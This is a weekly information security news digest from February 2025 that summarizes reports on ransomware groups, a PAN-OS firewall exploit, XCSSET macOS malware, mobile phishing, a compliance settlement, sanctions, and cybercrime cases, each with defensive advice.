Information Security News – 2/24/2025

Ghost Ransomware Targets Orgs in 70+ Countries

Article Link: https://www.darkreading.com/cyberattacks-data-breaches/ghost-ransomware-targets-orgs-70-countries

• A fast-moving ransomware group known as Ghost is tearing through networks across 70+ countries, locking up data and demanding payment since 2021.
• Security analysts report these attackers rapidly progress from initial breach to ransomware deployment, often within a single day, a speed uncommon among similar threat actors.
• Their swift operations and global presence appear to pose a substantial threat to various sectors, pursuing critical infrastructure, education, healthcare, and government services as their targets.
• On February 19, 2025, as part of the #StopRansomware campaign, the Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory for organizations to update software and firmware right away, especially for systems exposed to the internet, to mitigate vulnerabilities exploited by this group.
• CISA Advisory: https://www.cisa.gov/news-events/alerts/2025/02/19/cisa-and-partners-release-advisory-ghost-cring-ransomware

Palo Alto Networks Confirms Exploitation of Firewall Vulnerability

Article Link: https://www.securityweek.com/palo-alto-networks-confirms-exploitation-of-firewall-vulnerability/

• A newly discovered attack method is actively exploiting unpatched PAN-OS firewalls, allowing unauthorized access to system configurations and sensitive data.
• Threat actors are leveraging three distinct vulnerabilities—CVE-2025-0108, CVE-2024-9474, and CVE-2025-0111—in a multi-stage assault that bypasses authentication, escalates privileges, and extracts confidential files.
• Malicious activity linked to this exploit has been traced to multiple regions, including the U.S., Germany, and the Netherlands. The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-0108 to its list of known exploited flaws, emphasizing the severity of the threat.
• Palo Alto Networks has issued fixes as of February 12, 2025. Organizations are advised to apply the patches without delay and restrict external access to administrative interfaces to reduce exposure.

XCSSET macOS Malware Returns with First New Version Since 2022

Article Link: https://www.theregister.com/2025/02/17/macos_xcsset_malware_returns/

• A contemporary variant of the XCSSET malware has resurfaced, the first update since 2022, putting Apple developers at risk. Microsoft reports that this malware spreads through infected Xcode projects, silently compromising macOS systems.
• The latest version retains its ability to steal data from Notes, digital wallets, and other system files but now includes new stealth tactics, making it harder to detect. It also introduces updated methods to maintain access, ensuring it stays on compromised devices longer.
• Once inside, the malware alters system files to launch with every terminal session and even replaces the legitimate Launchpad app in the macOS dock, duping users into running malicious code.
• Researchers emphasize the need to thoroughly inspect Xcode projects before use, limit downloads to trusted sources, and monitor for unusual system behavior to prevent infection. Keeping macOS security settings at their highest level can also help block unauthorized changes.

Mobile Phishing Attacks Surge with 16% of Incidents in US

Article Link: https://www.infosecurity-magazine.com/news/mobile-phishing-attacks-surge-16/

• New research confirms mobile phishing scams, known as “mishing” are escalating. A Zimperium report analyzing 750,000 devices reveals that 16% of these attacks are hitting users in the United States.
• Criminals are zeroing in on mobile platforms, taking advantage of widespread smartphone use to lure victims into clicking deceptive links and entering credentials on fake login pages.
• The report shows that quishing and phishing tactics are used to evade detection and bypass built-in mobile security, exploiting weaknesses in messaging apps, email, and social media platforms to reach victims more effectively than ever before.
• Security experts insist companies adopt mobile defense tools, such as phishing-resistant multi-factor authentication (MFA), conduct user training and awareness, and perform real-time URL analysis.
• Zimperium Report: https://www.zimperium.com/resources/zimperium-research-exposes-surge-in-mishing-mobile-targeted-phishing-attacks/

U.S. Healthcare Org Pays $11M Settlement Over Alleged Cybersecurity Lapses

Article Link: https://www.bleepingcomputer.com/news/security/us-healthcare-org-pays-11m-settlement-over-alleged-cybersecurity-lapses/

• A $11.25 million settlement has been reached after Health Net Federal Services (HNFS) was accused of misrepresenting its adherence to security obligations under a Defense Health Agency (DHA) TRICARE contract.
• Between 2015 and 2018, HNFS allegedly failed to apply required protections while managing sensitive military healthcare data but falsely certified compliance in reports to the government.
• The settlement resolves claims under the False Claims Act, which penalizes companies for misrepresenting security compliance in government contracts. HNFS has not admitted liability but has agreed to the payout.
• The U.S. Department of Justice claims the company neglected mandated security controls, such as vulnerability scanning, firewall safeguards, access restrictions, and putting military personnel and their families at possible risk, thus illustrating the need for accurate compliance reporting, frequent security assessments, and prompt action on risks to avoid legal consequences and financial penalties.

LockBit Crackdown Continues with Zservers Sanctions

Article Link: https://www.scworld.com/news/lockbit-crackdown-continues-with-zservers-sanctions

• The U.S., U.K., and Australia have slapped sanctions on Zservers, a Russian-based bulletproof hosting provider accused of supporting LockBit ransomware operations.
• Investigators say Zservers supplied infrastructure built to evade law enforcement, making it a go-to choice for cybercriminals. One 2022 case tied the company to a LockBit ransomware attack, when Canadian authorities traced a virtual machine running the malware to an IP address subleased from Zservers.
• These sanctions block financial dealings with Zservers and target key operators to disrupt ransomware activity. Experts warn that LockBit, which faced a series of disruptions over the past year, and similar groups will likely pivot to new webhosting services to keep their operations running.
• Officials strongly contend companies must stay ahead of the threat by hardening network defenses, conducting frequent security audits, and staying alert to evolving tactics used by ransomware gangs.
  

U.S. Minerals Company Says Crooks Broke into Email and Helped Themselves to $500K

Article Link: https://www.theregister.com/2025/02/20/niocorp_bec_scam/

• Cybercriminals infiltrated NioCorp Developments, a NASDAQ-listed U.S. minerals company, on February 14, rerouting approximately $500,000 meant for a vendor.
• Using a business email compromise (BEC) attack, the perpetrators gained access to NioCorp’s systems, including parts of its email platform, and manipulated transactions to divert the funds. After detecting the attack, NioCorp alerted financial institutions and federal law enforcement while taking steps to contain the breach and reinforce its defenses.
• NioCorp specializes in minerals like niobium, scandium, and titanium mining and is still in its early development phase, with no revenue generation yet. The financial consequences of this breach are under review, and recovery efforts are ongoing.
• Information security specialists counsel businesses to verify payment requests and suggest organizations adopt stricter email authentication measures, perform routine system reviews, and educate employees to spot fraudulent communications before they cause harm.

Black Basta Ransomware Gang’s Internal Chat Logs Leak Online

Article Link: https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-s-internal-chat-logs-leak-online/

• An anonymous individual has leaked internal chat logs from the Black Basta ransomware group, exposing their covert operations.
• The leaker, known as ExploitWhispers, shared the data on a Telegram channel, possibly in response to Black Basta’s alleged attacks on Russian financial institutions.
• The breach provides an unfiltered look into the inner workings of a major ransomware syndicate, revealing how cybercriminals coordinate attacks, move cryptocurrency, and select victims. The leaked messages, covering September 2023 to September 2024, expose phishing tactics and financial transactions tied to their operations.
• Security professionals prescribe that organizations strengthen defenses by deploying advanced threat detection, performing routine security evaluations, and training employees to recognize phishing attempts to lower the risk of ransomware attacks.

U.S. Soldier Pleads Guilty to AT&T and Verizon Cyberattacks, Linked to Snowflake Data Theft

Article Link: https://www.techradar.com/pro/security/us-soldier-pleads-guilty-to-at-and-t-and-verizon-cyberattacks-linked-to-snowflake-data-theft

• Cameron John Wagenius has agreed to plead guilty after stealing and selling confidential AT&T and Verizon phone records, a scheme linked to the 2024 Snowflake breach.
• Using the alias ‘Kiberphant0m,’ prosecutors say he infiltrated 150+ accounts, targeting AT&T, Santander, and Ticketmaster in a massive cyberattack.
• The Snowflake breach saw hackers extort over $2 million. Wagenius now faces up to 20 years in prison and $500,000 in fines.
• Information security analysts caution businesses to tighten data controls, assess their systems frequently, and monitor for suspicious activity before criminals achieve successful access.